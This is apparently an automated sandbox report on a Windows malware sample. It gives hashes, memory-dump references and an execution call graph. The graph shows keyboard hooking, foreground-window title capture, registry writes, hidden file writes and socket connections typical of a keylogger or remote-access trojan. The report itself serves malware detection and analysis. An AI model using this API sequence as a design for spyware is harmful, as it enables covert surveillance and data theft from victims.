• Opcode ID: bef8fee2efae6e140b92d5177bf306fa4676ac3d538135c52226057c450ea2fe
• Instruction ID: 312af72af954a67e04863b2b7c8196380fe2923003f77fd89c9a8003d5178429
• Opcode Fuzzy Hash: bef8fee2efae6e140b92d5177bf306fa4676ac3d538135c52226057c450ea2fe
• Instruction Fuzzy Hash: D2414D7DA002589BEB21DB68CC94BDAB7FDAB08340F4440E5A648E7251EF74AF94CF11
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 028AAD15
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028AAD39
• GetModuleFileNameA.KERNEL32(028A0000,?,00000105), ref: 028AAD54
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028AADEA
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 3bed6929e5a64eb182ffd05c7a263d624f9f60786d231a68669244dc0752eed2
• Instruction ID: 842b387c5abef5beb62485275633bf79c76ca1d7c972dcede7b452d09d16925e
• Opcode Fuzzy Hash: 3bed6929e5a64eb182ffd05c7a263d624f9f60786d231a68669244dc0752eed2
• Instruction Fuzzy Hash: 78414F7CA002589BEB21DB68CC94BDAB7FDAB08341F4440E5A648E7251EF74AF94CF51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: da0bfbf7b235880fc07d8a62e1e7aa01fabda367db109c518e6d2fe3fe80c898
• Instruction ID: 60645dcec424bdeaf8a385715fbb4939467f1f03316ca79537d806849240d69e
• Opcode Fuzzy Hash: da0bfbf7b235880fc07d8a62e1e7aa01fabda367db109c518e6d2fe3fe80c898
• Instruction Fuzzy Hash: CBA1056E7106040BF718AA7C9CAC3BDB3C69BC4365F18823EE21DCB785EF68D9518651
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,028A9596), ref: 028A952E
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,028A9596), ref: 028A9534
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
• Opcode ID: 42318845882b5f40da2d8804bf08152533912fee6f619ae60cc17c6a6208ba3b
• Instruction ID: f0a07790088578bf14dfee0063de3933ba81a940c885f3729e94fe29e1748863
• Opcode Fuzzy Hash: 42318845882b5f40da2d8804bf08152533912fee6f619ae60cc17c6a6208ba3b
• Instruction Fuzzy Hash: 1621917DA052189FEF14DF68C861AAAB3F9EF48310F5140A5E905E7240EB709E40CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• IsBadReadPtr.KERNEL32(?,00000004,?,00000004,?,00000008), ref: 028B9FD0
• IsBadWritePtr.KERNEL32(?,00000004,?,00000004,?,00000004,?,00000008), ref: 028BA000
• IsBadReadPtr.KERNEL32(?,00000008), ref: 028BA01F
• IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 028BA02B
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: Read$Write
• String ID:
• API String ID: 3448952669-0
• Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
• Instruction ID: 239d18c16a5a578cdbbab0839881336be30f8c628f53a9d2d2fee463fcd6c9ce
• Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
• Instruction Fuzzy Hash: DE21C07D60021ADBDF15CE29CC80BEE73A9EF84361F088519FE14D7345EB34E8128AA0
Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2.6%
                                                                                                                              Dynamic/Decrypted Code Coverage:99.3%
                                                                                                                              Signature Coverage:4.2%
                                                                                                                              Total number of Nodes:1677
                                                                                                                              Total number of Limit Nodes:41
466417e 28 API calls 97418->97422 97425 466db0e 97419->97425 97424 466dabc 97420->97424 97427 4661f09 26 API calls 97421->97427 97423 466dbbd 97422->97423 98466 466ddd1 28 API calls 97423->98466 97431 466417e 28 API calls 97424->97431 97430 466417e 28 API calls 97425->97430 97427->97408 97428 466dbd0 98467 4662fa5 28 API calls 97428->98467 97434 466db24 97430->97434 97433 466dad2 97431->97433 97432 466dbdb 98468 4662fa5 28 API calls 97432->98468 98464 4662fa5 28 API calls 97433->98464 98465 4662fa5 28 API calls 97434->98465 97438 466dbe5 97441 4661f09 26 API calls 97438->97441 97439 466dadd 97443 4661f13 28 API calls 97439->97443 97440 466db2f 97442 4661f13 28 API calls 97440->97442 97444 466dbef 97441->97444 97446 466db3a 97442->97446 97445 466dae8 97443->97445 97447 4661f09 26 API calls 97444->97447 97449 4661f09 26 API calls 97445->97449 97448 4661f09 26 API calls 97446->97448 97450 466dbf8 97447->97450 97452 466db43 97448->97452 97451 466daf1 97449->97451 97453 4661f09 26 API calls 97450->97453 97455 4661f09 26 API calls 97451->97455 97454 4661f09 26 API calls 97452->97454 97456 466dc01 97453->97456 97454->97421 97455->97421 97457 4661f09 26 API calls 97456->97457 97458 466dc0a 97457->97458 97459 4661f09 26 API calls 97458->97459 97460 466dc13 97459->97460 97460->96913 97461->96924 97462->96946 97464 467371e RegQueryValueExA RegCloseKey 97463->97464 97465 4673742 97463->97465 97464->97465 97465->96906 97466->96974 97467->96984 97468->97007 97469->96996 97470->97040 97471->96846 97474 467b4c5 LoadResource LockResource SizeofResource 97473->97474 97475 466f3de 97473->97475 97474->97475 97475->97074 97477 46620b7 28 API calls 97476->97477 97478 4666dec 97477->97478 97478->97085 97484 466423a 97479->97484 97482->97107 97483->97088 97485 4664243 97484->97485 97486 46623ce 26 API calls 97485->97486 97487 466424e 97486->97487 97488 4662569 28 API calls 97487->97488 97489 46641b5 97488->97489 97489->97107 97490->97111 97493 46632aa 97492->97493 97494 46628e8 28 API 
calls 97493->97494 97495 46632c9 97493->97495 97494->97495 97495->97121 97497 46651fb 97496->97497 97506 4665274 97497->97506 97499 4665208 97499->97124 97501 4662061 97500->97501 97502 46623ce 26 API calls 97501->97502 97503 466207b 97502->97503 97532 466267a 97503->97532 97507 4665282 97506->97507 97508 466529e 97507->97508 97509 4665288 97507->97509 97511 46652b6 97508->97511 97512 46652f5 97508->97512 97521 46625f0 97509->97521 97515 46628e8 28 API calls 97511->97515 97518 466529c 97511->97518 97530 46628a4 28 API calls 97512->97530 97515->97518 97518->97499 97522 4662888 28 API calls 97521->97522 97523 4662602 97522->97523 97524 4662672 97523->97524 97525 4662629 97523->97525 97531 46628a4 28 API calls 97524->97531 97528 46628e8 28 API calls 97525->97528 97529 466263b 97525->97529 97528->97529 97529->97518 97533 466268b 97532->97533 97534 46623ce 26 API calls 97533->97534 97535 466208d 97534->97535 97535->97127 97536->97135 97537->97137 97540 467bfc4 GetCurrentProcess 97539->97540 97541 467b2d1 97539->97541 97540->97541 97542 46735a6 RegOpenKeyExA 97541->97542 97543 46735d4 RegQueryValueExA RegCloseKey 97542->97543 97544 46735fe 97542->97544 97543->97544 97545 4662093 28 API calls 97544->97545 97546 4673613 97545->97546 97546->97148 97547->97156 97549 466b90c 97548->97549 97554 4662252 97549->97554 97551 466b917 97558 466b92c 97551->97558 97553 466b926 97553->97167 97555 46622ac 97554->97555 97556 466225c 97554->97556 97555->97551 97556->97555 97565 4662779 26 API calls std::_Deallocate 97556->97565 97559 466b966 97558->97559 97560 466b938 97558->97560 97577 46628a4 28 API calls 97559->97577 97566 46627e6 97560->97566 97564 466b942 97564->97553 97565->97555 97567 46627ef 97566->97567 97568 4662851 97567->97568 97569 46627f9 97567->97569 97579 46628a4 28 API calls 97568->97579 97572 4662815 97569->97572 97573 4662802 97569->97573 97575 4662813 97572->97575 97576 4662252 26 API calls 97572->97576 97578 4662aea 28 API calls __EH_prolog 97573->97578 97575->97564 
97576->97575 97578->97575 97580->97170 97582 4662347 97581->97582 97583 4662252 26 API calls 97582->97583 97584 46623c7 97583->97584 97584->97170 97586 46624f9 97585->97586 97587 466250a 28 API calls 97586->97587 97588 46620b1 97587->97588 97588->96918 97607 469ba0a 97589->97607 97591 466efb7 97591->96934 97591->97206 97592 469ae50 97615 469a7b7 97592->97615 97594 469ae2a 97596 46a05dd __dosmaperr 20 API calls 97594->97596 97595 469ae15 97595->97591 97595->97592 97595->97594 97597 469ae2f 97596->97597 97614 469bcec 26 API calls std::_Deallocate 97597->97614 97600 469ae5c 97601 469ae8b 97600->97601 97623 469ba4f 42 API calls __Tolower 97600->97623 97604 469aef7 97601->97604 97624 469b9b6 26 API calls 2 library calls 97601->97624 97625 469b9b6 26 API calls 2 library calls 97604->97625 97605 469afbe _strftime 97605->97591 97606 46a05dd __dosmaperr 20 API calls 97605->97606 97606->97591 97608 469ba0f 97607->97608 97609 469ba22 97607->97609 97610 46a05dd __dosmaperr 20 API calls 97608->97610 97609->97595 97611 469ba14 97610->97611 97626 469bcec 26 API calls std::_Deallocate 97611->97626 97613 469ba1f 97613->97595 97614->97591 97616 469a7ca 97615->97616 97617 469a7d4 97615->97617 97616->97600 97617->97616 97627 46a8215 38 API calls 4 library calls 97617->97627 97619 469a7f5 97628 46a8364 38 API calls __Tolower 97619->97628 97621 469a80e 97629 46a8391 38 API calls _strftime 97621->97629 97623->97600 97624->97604 97625->97605 97626->97613 97627->97619 97628->97621 97629->97616 97640 46a1b10 97630->97640 97632 467cdda SetConsoleOutputCP 97633 467cd58 GetStdHandle GetConsoleScreenBufferInfo SetConsoleTextAttribute 97632->97633 97634 4667200 76 API calls 97633->97634 97635 467cd8c SetConsoleTextAttribute 97634->97635 97635->97212 97637 466720c 97636->97637 97665 46671e5 97637->97665 97641 46a1b1c ___FrameUnwindToState 97640->97641 97642 46a1b2a 97641->97642 97643 46a1b4b 97641->97643 97646 46a1b5c 97641->97646 97644 46a05dd __dosmaperr 20 API calls 97642->97644 97645 46a05dd 
__dosmaperr 20 API calls 97643->97645 97647 46a1b2f 97644->97647 97654 46a1b39 ___FrameUnwindToState 97645->97654 97646->97642 97649 46a1b74 97646->97649 97662 469bcec 26 API calls std::_Deallocate 97647->97662 97650 46a1b78 97649->97650 97651 46a1b84 97649->97651 97652 46a05dd __dosmaperr 20 API calls 97650->97652 97661 469c25a EnterCriticalSection 97651->97661 97652->97654 97654->97632 97655 46a1b8f 97657 46a1ba8 97655->97657 97663 46a00a0 65 API calls 3 library calls 97655->97663 97658 46a1bfe 97657->97658 97659 46a05dd __dosmaperr 20 API calls 97657->97659 97664 46a1c18 LeaveCriticalSection 97658->97664 97659->97658 97661->97655 97662->97654 97663->97657 97664->97654 97666 46671f2 ___scrt_initialize_default_local_stdio_options 97665->97666 97669 469f6af 97666->97669 97670 469f6df 97669->97670 97671 469f6f4 97669->97671 97672 46a05dd __dosmaperr 20 API calls 97670->97672 97671->97670 97673 469f6f8 97671->97673 97674 469f6e4 97672->97674 97678 469c34c 97673->97678 97681 469bcec 26 API calls std::_Deallocate 97674->97681 97677 46671fc CreateThread 97677->96934 98469 467d45d GetModuleFileNameA 97677->98469 97682 469c2d3 97678->97682 97680 469c370 97680->97677 97681->97677 97683 469c2df ___FrameUnwindToState 97682->97683 97690 469c25a EnterCriticalSection 97683->97690 97685 469c2ed 97691 469cddb 97685->97691 97689 469c30b ___FrameUnwindToState 97689->97680 97690->97685 97707 46aab22 97691->97707 97694 469a7b7 _strftime 38 API calls 97695 469ce15 97694->97695 97718 469cc76 97695->97718 97705 469c2fa 97706 469c318 LeaveCriticalSection 97705->97706 97706->97689 97749 46aaae7 97707->97749 97709 46aab31 97756 46b54f5 97709->97756 97711 46aab37 97712 469cdfe 97711->97712 97713 46aab8c 97711->97713 97712->97694 97765 46a6137 21 API calls 3 library calls 97713->97765 97715 46aab96 97716 46a6782 _free 20 API calls 97715->97716 97717 46aab9f 97716->97717 97717->97712 97719 469cc95 _swprintf 97718->97719 97720 46a05dd __dosmaperr 20 API calls 97719->97720 97721 469cca1 
97720->97721 97722 469d0a0 97721->97722 97766 469f03e 26 API calls 2 library calls 97722->97766 97724 469d0c5 97725 46a05dd __dosmaperr 20 API calls 97724->97725 97726 469d0ca 97725->97726 97767 469bcec 26 API calls std::_Deallocate 97726->97767 97727 469ce55 97735 469cce0 97727->97735 97729 469d0b0 _swprintf 97729->97724 97729->97727 97768 469d6ba 26 API calls 2 library calls 97729->97768 97769 469e7b5 42 API calls _swprintf 97729->97769 97770 469d882 42 API calls _swprintf 97729->97770 97771 469d8d3 50 API calls 3 library calls 97729->97771 97772 469de9d 50 API calls _swprintf 97729->97772 97736 46a6782 _free 20 API calls 97735->97736 97737 469ccf0 97736->97737 97738 46aabd7 97737->97738 97739 46aabe2 97738->97739 97741 469ce84 97738->97741 97739->97741 97773 469feb9 97739->97773 97742 4694fcb 97741->97742 97743 4694fd4 97742->97743 97744 4694fd6 IsProcessorFeaturePresent 97742->97744 97743->97705 97746 4695018 97744->97746 97779 4694fdc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97746->97779 97748 46950fb 97748->97705 97750 46aab08 97749->97750 97751 46aaaf3 97749->97751 97750->97709 97752 46a05dd __dosmaperr 20 API calls 97751->97752 97753 46aaaf8 97752->97753 97754 469bcec _strftime 26 API calls 97753->97754 97755 46aab03 97754->97755 97755->97709 97757 46b550f 97756->97757 97758 46b5502 97756->97758 97760 46b551b 97757->97760 97761 46a05dd __dosmaperr 20 API calls 97757->97761 97759 46a05dd __dosmaperr 20 API calls 97758->97759 97762 46b5507 97759->97762 97760->97711 97763 46b553c 97761->97763 97762->97711 97764 469bcec _strftime 26 API calls 97763->97764 97764->97762 97765->97715 97766->97729 97767->97727 97768->97729 97769->97729 97770->97729 97771->97729 97772->97729 97774 469fecd 97773->97774 97775 469fed1 97773->97775 97774->97741 97775->97774 97776 46aaae7 26 API calls 97775->97776 97777 469fef1 97776->97777 97778 46ab94c __wsopen_s 62 API calls 97777->97778 97778->97774 97779->97748 97785 4661fb0 
97780->97785 97782 4662f1e 97783 4662055 26 API calls 97782->97783 97784 4662f2d 97783->97784 97784->97228 97786 46625f0 28 API calls 97785->97786 97787 4661fbd 97786->97787 97787->97782 97789 466a127 97788->97789 97790 4673549 3 API calls 97789->97790 97791 466a12e 97790->97791 97792 466a142 97791->97792 97793 466a15c 97791->97793 97795 466a147 97792->97795 97796 4669e9b 97792->97796 97809 466905c 97793->97809 97798 466905c 28 API calls 97795->97798 97796->96969 97800 466a155 97798->97800 97837 466a22d 29 API calls 97800->97837 97802 466a15a 97802->97796 97803->97255 97985 4663222 97804->97985 97806 4663022 97989 4663262 97806->97989 97810 4669072 97809->97810 97811 4662252 26 API calls 97810->97811 97812 466908c 97811->97812 97838 4664267 97812->97838 97814 466909a 97815 466a179 97814->97815 97850 466b8ec 97815->97850 97818 466a1a2 97821 4662093 28 API calls 97818->97821 97819 466a1ca 97820 4662093 28 API calls 97819->97820 97822 466a1d5 97820->97822 97823 466a1ac 97821->97823 97824 4662093 28 API calls 97822->97824 97825 467bc5e 28 API calls 97823->97825 97826 466a1e4 97824->97826 97827 466a1ba 97825->97827 97828 467b4ef 79 API calls 97826->97828 97854 466b164 31 API calls new 97827->97854 97831 466a1e9 CreateThread 97828->97831 97830 466a1c1 97832 4661fd8 26 API calls 97830->97832 97833 466a204 CreateThread 97831->97833 97834 466a210 CreateThread 97831->97834 97862 466a27d 97831->97862 97832->97819 97833->97834 97859 466a267 97833->97859 97835 4661f09 26 API calls 97834->97835 97856 466a289 97834->97856 97836 466a224 97835->97836 97836->97796 97837->97802 97984 466a273 162 API calls 97837->97984 97839 4662888 28 API calls 97838->97839 97840 466427b 97839->97840 97841 46642a5 97840->97841 97842 4664290 97840->97842 97843 46627e6 28 API calls 97841->97843 97848 46642df 28 API calls 97842->97848 97847 46642a3 97843->97847 97845 4664299 97849 4662c48 28 API calls 97845->97849 97847->97814 97848->97845 97849->97847 97851 466b8f5 97850->97851 97852 466a197 
97850->97852 97855 466b96c 28 API calls 97851->97855 97852->97818 97852->97819 97854->97830 97855->97852 97865 466acd6 97856->97865 97917 466a2b8 97859->97917 97937 466a726 97862->97937 97867 466ace4 97865->97867 97866 466ad3e Sleep GetForegroundWindow GetWindowTextLengthW 97870 466b904 28 API calls 97866->97870 97867->97866 97868 466a292 97867->97868 97874 467bae6 GetTickCount 97867->97874 97875 466ad84 GetWindowTextW 97867->97875 97877 4661f09 26 API calls 97867->97877 97878 466aedc 97867->97878 97879 466b8ec 28 API calls 97867->97879 97881 466ae49 Sleep 97867->97881 97884 4662093 28 API calls 97867->97884 97885 466add1 97867->97885 97887 46652fd 28 API calls 97867->97887 97889 4663014 28 API calls 97867->97889 97890 4666383 28 API calls 97867->97890 97892 466a636 27 API calls 97867->97892 97893 467bc5e 28 API calls 97867->97893 97894 4661fd8 26 API calls 97867->97894 97895 46943e6 EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait 97867->97895 97896 4661f86 97867->97896 97900 4694770 29 API calls __onexit 97867->97900 97901 46943a7 SetEvent ResetEvent EnterCriticalSection LeaveCriticalSection __Init_thread_wait 97867->97901 97902 4669044 28 API calls 97867->97902 97904 466b97c 28 API calls 97867->97904 97905 466b748 40 API calls 2 library calls 97867->97905 97906 46a1e81 97867->97906 97870->97867 97874->97867 97875->97867 97877->97867 97880 4661f09 26 API calls 97878->97880 97879->97867 97880->97868 97881->97867 97884->97867 97885->97867 97888 466905c 28 API calls 97885->97888 97903 466b164 31 API calls new 97885->97903 97887->97867 97888->97885 97889->97867 97890->97867 97892->97867 97893->97867 97894->97867 97897 4661f8e 97896->97897 97898 4662252 26 API calls 97897->97898 97899 4661f99 97898->97899 97899->97867 97900->97867 97901->97867 97902->97867 97903->97885 97904->97867 97905->97867 97907 46a1e8d 97906->97907 97910 46a1c7d 97907->97910 97911 46a1c94 97910->97911 97912 46a05dd __dosmaperr 20 API calls 97911->97912 97915 
46a1cd5 97911->97915 97913 46a1ccb 97912->97913 97916 469bcec 26 API calls std::_Deallocate 97913->97916 97915->97867 97916->97915 97918 466a333 GetMessageA 97917->97918 97919 466a2d1 GetModuleHandleA SetWindowsHookExA 97917->97919 97921 466a345 TranslateMessage DispatchMessageA 97918->97921 97931 466a270 97918->97931 97919->97918 97920 466a2ed GetLastError 97919->97920 97932 467bb8e 97920->97932 97921->97918 97921->97931 97924 46652fd 28 API calls 97925 466a30e 97924->97925 97926 4662093 28 API calls 97925->97926 97927 466a31d 97926->97927 97928 467b4ef 79 API calls 97927->97928 97929 466a322 97928->97929 97930 4661fd8 26 API calls 97929->97930 97930->97931 97933 46a1e81 26 API calls 97932->97933 97934 467bbb2 97933->97934 97935 4662093 28 API calls 97934->97935 97936 466a2fe 97935->97936 97936->97924 97938 466a73b Sleep 97937->97938 97958 466a675 97938->97958 97940 466a286 97941 466a77b CreateDirectoryW 97943 466a74d 97941->97943 97942 466a78c GetFileAttributesW 97942->97943 97943->97938 97943->97940 97943->97941 97943->97942 97944 466a7a3 SetFileAttributesW 97943->97944 97948 4661e65 28 API calls 97943->97948 97956 466a7ee 97943->97956 97971 467c3f1 97943->97971 97944->97943 97945 46620df 26 API calls 97945->97956 97947 466a81d PathFileExistsW 97947->97956 97948->97943 97950 46620b7 28 API calls 97950->97956 97951 466a926 SetFileAttributesW 97951->97943 97952 4661fd8 26 API calls 97952->97956 97953 4666dd8 28 API calls 97953->97956 97954 4661fe2 28 API calls 97954->97956 97956->97945 97956->97947 97956->97950 97956->97951 97956->97952 97956->97953 97956->97954 97957 4661fd8 26 API calls 97956->97957 97981 467c485 32 API calls 97956->97981 97982 467c4f2 CreateFileW SetFilePointer CloseHandle WriteFile FindCloseChangeNotification 97956->97982 97957->97943 97959 466a722 97958->97959 97961 466a68b 97958->97961 97959->97943 97960 466a6aa CreateFileW 97960->97961 97962 466a6b8 GetFileSize 97960->97962 97961->97960 97963 466a6ed FindCloseChangeNotification 97961->97963 
97964 466a6ff 97961->97964 97965 466a6e2 Sleep 97961->97965 97966 466a6db 97961->97966 97962->97961 97962->97963 97963->97961 97964->97959 97968 466905c 28 API calls 97964->97968 97965->97963 97983 466b0dc 83 API calls 97966->97983 97969 466a71b 97968->97969 97970 466a179 123 API calls 97969->97970 97970->97959 97972 467c404 CreateFileW 97971->97972 97974 467c441 97972->97974 97975 467c43d 97972->97975 97976 467c461 WriteFile 97974->97976 97977 467c448 SetFilePointer 97974->97977 97975->97943 97979 467c476 FindCloseChangeNotification 97976->97979 97980 467c474 97976->97980 97977->97976 97978 467c458 CloseHandle 97977->97978 97978->97975 97979->97975 97980->97979 97981->97956 97982->97956 97983->97965 97986 466322e 97985->97986 97995 4663618 97986->97995 97988 466323b 97988->97806 97990 466326e 97989->97990 97991 4662252 26 API calls 97990->97991 97992 4663288 97991->97992 97993 4662336 26 API calls 97992->97993 97994 4663031 97993->97994 97994->97260 97996 4663626 97995->97996 97997 4663644 97996->97997 97998 466362c 97996->97998 98000 466369e 97997->98000 98001 466365c 97997->98001 98006 46636a6 28 API calls 97998->98006 98007 46628a4 28 API calls 98000->98007 98003 46627e6 28 API calls 98001->98003 98005 4663642 98001->98005 98003->98005 98005->97988 98006->98005 98009 4664186 98008->98009 98010 4662252 26 API calls 98009->98010 98011 4664191 98010->98011 98019 46641bc 98011->98019 98014 46642fc 98030 4664353 98014->98030 98016 466430a 98017 4663262 26 API calls 98016->98017 98018 4664319 98017->98018 98018->97270 98020 46641c8 98019->98020 98023 46641d9 98020->98023 98022 466419c 98022->98014 98024 46641e9 98023->98024 98025 4664206 98024->98025 98026 46641ef 98024->98026 98027 46627e6 28 API calls 98025->98027 98028 4664267 28 API calls 98026->98028 98029 4664204 98027->98029 98028->98029 98029->98022 98031 466435f 98030->98031 98034 4664371 98031->98034 98033 466436d 98033->98016 98035 466437f 98034->98035 98036 4664385 98035->98036 98037 466439e 98035->98037 
98098 46634e6 28 API calls 98036->98098 98038 4662888 28 API calls 98037->98038 98039 46643a6 98038->98039 98041 46643bf 98039->98041 98042 4664419 98039->98042 98044 46627e6 28 API calls 98041->98044 98053 466439c 98041->98053 98099 46628a4 28 API calls 98042->98099 98044->98053 98053->98033 98098->98053 98101 466536b 98100->98101 98104 4665382 98101->98104 98103 4665379 98103->97278 98105 4665390 98104->98105 98106 4665396 98105->98106 98107 46653ad 98105->98107 98117 4663850 28 API calls 98106->98117 98108 4662888 28 API calls 98107->98108 98109 46653b5 98108->98109 98111 4665427 98109->98111 98112 46653ce 98109->98112 98118 46628a4 28 API calls 98111->98118 98114 46628e8 28 API calls 98112->98114 98116 46653ab 98112->98116 98114->98116 98116->98103 98117->98116 98125 469aa9a 98119->98125 98123 467388f RegSetValueExA RegCloseKey 98122->98123 98124 46738b9 98122->98124 98123->98124 98124->97291 98128 469aa1b 98125->98128 98127 466170d 98127->97293 98129 469aa2a 98128->98129 98130 469aa3e 98128->98130 98131 46a05dd __dosmaperr 20 API calls 98129->98131 98134 469aa3a __alldvrm 98130->98134 98137 46a8957 11 API calls 2 library calls 98130->98137 98133 469aa2f 98131->98133 98136 469bcec 26 API calls std::_Deallocate 98133->98136 98134->98127 98136->98134 98137->98134 98140 467b8f9 ctype ___scrt_fastfail 98138->98140 98139 4662093 28 API calls 98141 4674f49 98139->98141 98140->98139 98141->97300 98142->97317 98144 4674f02 getaddrinfo WSASetLastError 98143->98144 98145 4674ef8 98143->98145 98144->97338 98282 4674d86 35 API calls ___std_exception_copy 98145->98282 98147 4674efd 98147->98144 98149 4664846 socket 98148->98149 98150 4664839 98148->98150 98152 4664842 98149->98152 98153 4664860 CreateEventW 98149->98153 98283 466489e WSAStartup 98150->98283 98152->97338 98153->97338 98154 466483e 98154->98149 98154->98152 98156 4664f65 98155->98156 98157 4664fea 98155->98157 98158 4664f6e 98156->98158 98159 4664fc0 CreateEventA CreateThread 98156->98159 98160 4664f7d 
GetLocalTime 98156->98160 98157->97338 98158->98159 98159->98157 98284 4665150 98159->98284 98161 467bb8e 28 API calls 98160->98161 98162 4664f91 98161->98162 98163 46652fd 28 API calls 98162->98163 98164 4664fa1 98163->98164 98165 4662093 28 API calls 98164->98165 98166 4664fb0 98165->98166 98167 467b4ef 79 API calls 98166->98167 98168 4664fb5 98167->98168 98169 4661fd8 26 API calls 98168->98169 98169->98159 98171 46648ee 98170->98171 98172 4664a1b 98170->98172 98173 466497e 98171->98173 98176 466531e 28 API calls 98171->98176 98196 4664923 98171->98196 98172->98173 98174 4664a21 WSAGetLastError 98172->98174 98173->97338 98174->98173 98175 4664a31 98174->98175 98177 4664a36 98175->98177 98178 4664932 98175->98178 98180 466490f 98176->98180 98293 467cae1 30 API calls 98177->98293 98183 4662093 28 API calls 98178->98183 98184 4662093 28 API calls 98180->98184 98182 466492b 98182->98178 98186 4664941 98182->98186 98187 4664a80 98183->98187 98188 466491e 98184->98188 98185 4664a40 98189 46652fd 28 API calls 98185->98189 98193 4664987 98186->98193 98194 4664950 98186->98194 98190 4662093 28 API calls 98187->98190 98191 467b4ef 79 API calls 98188->98191 98192 4664a50 98189->98192 98195 4664a8f 98190->98195 98191->98196 98197 4662093 28 API calls 98192->98197 98290 4681a40 56 API calls 98193->98290 98198 4662093 28 API calls 98194->98198 98199 467b4ef 79 API calls 98195->98199 98288 4680c60 27 API calls 98196->98288 98201 4664a5f 98197->98201 98202 466495f 98198->98202 98199->98173 98204 467b4ef 79 API calls 98201->98204 98205 4662093 28 API calls 98202->98205 98203 466498f 98206 46649c4 98203->98206 98207 4664994 98203->98207 98208 4664a64 98204->98208 98211 466496e 98205->98211 98292 4680e06 28 API calls 98206->98292 98209 4662093 28 API calls 98207->98209 98210 4661fd8 26 API calls 98208->98210 98213 46649a3 98209->98213 98210->98173 98214 467b4ef 79 API calls 98211->98214 98216 4662093 28 API calls 98213->98216 98217 4664973 98214->98217 98215 46649cc 98218 46649f9 
CreateEventW CreateEventW 98215->98218 98220 4662093 28 API calls 98215->98220 98219 46649b2 98216->98219 98289 467e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 98217->98289 98218->98173 98221 467b4ef 79 API calls 98219->98221 98223 46649e2 98220->98223 98224 46649b7 98221->98224 98225 4662093 28 API calls 98223->98225 98291 46810b2 54 API calls 98224->98291 98227 46649f1 98225->98227 98228 467b4ef 79 API calls 98227->98228 98229 46649f6 98228->98229 98229->98218 98294 467b7b6 GlobalMemoryStatusEx 98230->98294 98232 467b7f5 98232->97338 98295 4674580 98233->98295 98237 466dda5 98236->98237 98238 46734ff 3 API calls 98237->98238 98239 466ddac 98238->98239 98240 4673549 3 API calls 98239->98240 98241 466ddc4 98239->98241 98240->98241 98241->97338 98243 46620b7 28 API calls 98242->98243 98244 467bc57 98243->98244 98244->97338 98246 467bafc GetTickCount 98245->98246 98246->97338 98248 4696e90 ___scrt_fastfail 98247->98248 98249 467bab5 GetForegroundWindow GetWindowTextW 98248->98249 98250 466417e 28 API calls 98249->98250 98251 467badf 98250->98251 98251->97338 98253 4662093 28 API calls 98252->98253 98254 466f8f6 98253->98254 98254->97338 98256 46620df 26 API calls 98255->98256 98257 4662f3d 98256->98257 98258 46632a0 28 API calls 98257->98258 98259 4662f59 98258->98259 98259->97338 98261 46620df 26 API calls 98260->98261 98262 4664c27 98261->98262 98263 46620df 26 API calls 98262->98263 98266 4664c30 98263->98266 98264 469bd51 new 21 API calls 98264->98266 98266->98264 98267 46620b7 28 API calls 98266->98267 98268 4664ca1 98266->98268 98269 4661fe2 28 API calls 98266->98269 98272 4661fd8 26 API calls 98266->98272 98324 4664b96 98266->98324 98330 4664cc3 98266->98330 98267->98266 98342 4664e26 98 API calls 98268->98342 98269->98266 98271 4664ca8 98273 4661fd8 26 API calls 98271->98273 98272->98266 98274 4664cb1 98273->98274 98275 4661fd8 26 API calls 98274->98275 98276 4664cba 98275->98276 98276->97338 98278->97338 98279->97345 98280->97345 
